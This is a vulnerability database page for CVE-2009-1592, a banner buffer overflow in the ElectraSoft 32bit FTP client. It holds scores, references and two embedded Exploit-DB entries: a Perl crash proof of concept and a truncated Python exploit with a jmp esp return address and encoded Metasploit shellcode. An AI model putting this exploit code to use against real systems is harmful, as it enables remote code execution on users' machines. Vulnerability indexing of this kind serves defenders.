CVE-2009-1592
published 2009-05-08CVE-2009-1592: Stack-based buffer overflow in ElectraSoft 32bit FTP 09.04.24 allows remote FTP servers to execute arbitrary code via a long banner. NOTE: this might overlap…
PriorityP352critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
7.10%
93.4th percentile
Stack-based buffer overflow in ElectraSoft 32bit FTP 09.04.24 allows remote FTP servers to execute arbitrary code via a long banner. NOTE: this might overlap CVE-2003-1368.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| electrasoft | 32bit_ftp | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow (PoC)
exploitdb·2009-05-05
CVE-2009-1592 32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow (PoC)
32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow (PoC)
---
#!/usr/bin/perl
#
# A client side vulnerability in the product allows remote servers to cause the client to crash by sending it a large banner.
# By: Load 99%
#
# website: http://www.electrasoft.com/32ftp.htm
# Version:09.04.24
#
#0:005> g
# ...
#(9b0.bac): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=41414141 ebx=00000001 ecx=000013e7 edx=0382ec14 esi=fffffffe edi=00000000
#eip=41414141 esp=0382f018 ebp=0382f050 iopl=0 nv up ei pl nz na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
#41414141 ?? ???
#
use IO::Socket::INET;
my $socket = IO::Socket::INET->new('LocalPort' => 21,
'Prot
Exploit-DB
32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow
exploitdb·2009-05-05
CVE-2009-1592 32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow
32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow
---
#!/usr/bin/python
# _ _ _ __ _ _ _
#| || | (_) ___ / \ | |__ | | |
#| __ | | | (_-< | () | | / / |_ _|
#|_||_| |_| /__/ \__/ |_\_\ |_|
#
#[*] Bug : 32bit FTP (09.04.24) (Banner) Remote Buffer Overflow Exploit
#[*] Founder : Load 99%
#[*] Tested on : Xp sp3 (EN)(VB)
#[*] Exploited by : His0k4
#[*] Greetings : All friends & muslims HaCkErs (DZ),Algerians Elites,snakespc.com
#[*] Serra7 Merra7 koulchi mderra7 :p
from socket import *
payload = "\x41"*989
payload += "\x67\x86\x86\x7C" # jmp esp kernerl32.dll
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
payload += (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x
No writeups or analysis indexed.
http://osvdb.org/54219http://secunia.com/advisories/34993http://www.securityfocus.com/bid/34822http://www.vupen.com/english/advisories/2009/1263https://exchange.xforce.ibmcloud.com/vulnerabilities/50337https://www.exploit-db.com/exploits/8611https://www.exploit-db.com/exploits/8614http://osvdb.org/54219http://secunia.com/advisories/34993http://www.securityfocus.com/bid/34822http://www.vupen.com/english/advisories/2009/1263https://exchange.xforce.ibmcloud.com/vulnerabilities/50337https://www.exploit-db.com/exploits/8611https://www.exploit-db.com/exploits/8614
2009-05-08
Published